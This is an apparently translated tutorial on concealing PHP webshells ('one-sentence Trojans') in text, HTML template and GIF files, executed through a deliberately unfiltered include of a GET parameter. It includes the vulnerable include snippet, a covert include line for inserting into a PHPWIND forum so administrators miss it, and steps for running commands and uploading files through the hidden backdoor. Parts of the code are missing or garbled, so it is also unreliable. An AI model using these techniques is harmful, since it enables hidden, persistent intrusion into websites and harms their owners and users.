Recently, many friends have been asking me if I can hide my one-sentence Trojan in HTML or pictures. In fact, inserting one-sentence Trojan into PHP files is already very hidden. If I insist on putting it in HTML files or pictures, Let’s continue reading this test report. You must know that if you just put the PHP statement into the image, it will not be executed anyway, because PHP only parses files with the extension php. So it is necessary to be able to execute the PHP statements hidden in the picture. We just use the calling functions in PHP: include, require, etc.
We still remember the article about hiding Trojans in pictures a few days ago. That is, use statements such as include("x.gif") in the PHP file to call the Trojan horse statements hidden in the image. The statements in ASP are similar. It seems very hidden, but if you call the image directly, it will not be difficult for someone who knows a little bit about PHP to find something suspicious. Since it is difficult to pass parameters using the GET method in the URL, the performance of the Trojan insertion cannot be fully utilized.
The Include function is used frequently in PHP, so it causes too many security issues. For example, the vulnerability of PHPWIND1.36 is caused by the lack of filtering of variables behind include. From this we can construct similar statements to insert into PHP files. Then hide the Trojan in a picture or HTML file, which can be said to be more concealed. For example, insert the following statement in the PHPWIND forum: < ''?@include includ/.$PHPWIND_ROOT;? >General administrators cannot see it.
With the help of the include function, we can hide PHP Trojans in many types of files such as txt, html and image files. Because these three types of files, txt, html and image files, are the most common in forums and article systems, we will do the tests in order below.
First create a PHP file test.php. The content of the file is:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt files are generally description files, so we put the one-sentence Trojan It's OK to go to the description file of the directory. Just create a TXT file t.txt. We paste the one-sentence Trojan into the t.txt file. Then visit http://localhost/test/test.php?test=../t.txt. If you see the content of t.txt, it is OK. Then add the lanker mini PHP backdoor client Trojan address to http Just add cmd to the password of ://localhost/test/test.php?test=../t.txt , and you can see the results returned by execution.
For HTML files, they are generally template files. In order to enable the Trojan horse inserted into the HTML file to be called and executed without being displayed, we can add a text box with hidden attributes in the HTML, such as: Then use the same method as above. The return results of execution can generally be seen by viewing the source file. For example, use the function of viewing the directory of this program. Viewing the source file content, I can get the directory as C:Uniserver2_7swwwtest.
Now let’s talk about image files. The most poisonous trick is to hide the Trojan horse in the image. We can directly edit a picture and insert it at the end of the picture.
After testing, it will generally not affect the picture. Then add the client Trojan address in the same way
and we check the PHP environment variables. The result returned is the original image.
There may be some differences between the results here and what we imagined. In fact, the command has been run, but the returned results cannot be seen. Because this is a real GIF file, the returned results will not be displayed. In order to prove whether it is actually executed. After receiving the command, we execute the upload file command. As expected, the file has been successfully uploaded to the server. The advantage of such forgery is that it is well concealed. Needless to say, the disadvantage is that there is no response. If you want to see the results returned, take out Notepad and create a fake image file.
At this point, the test is basically completed. How to hide the PHP backdoor depends on your own choice. The writing is hurried, if there is anything wrong, please point it out!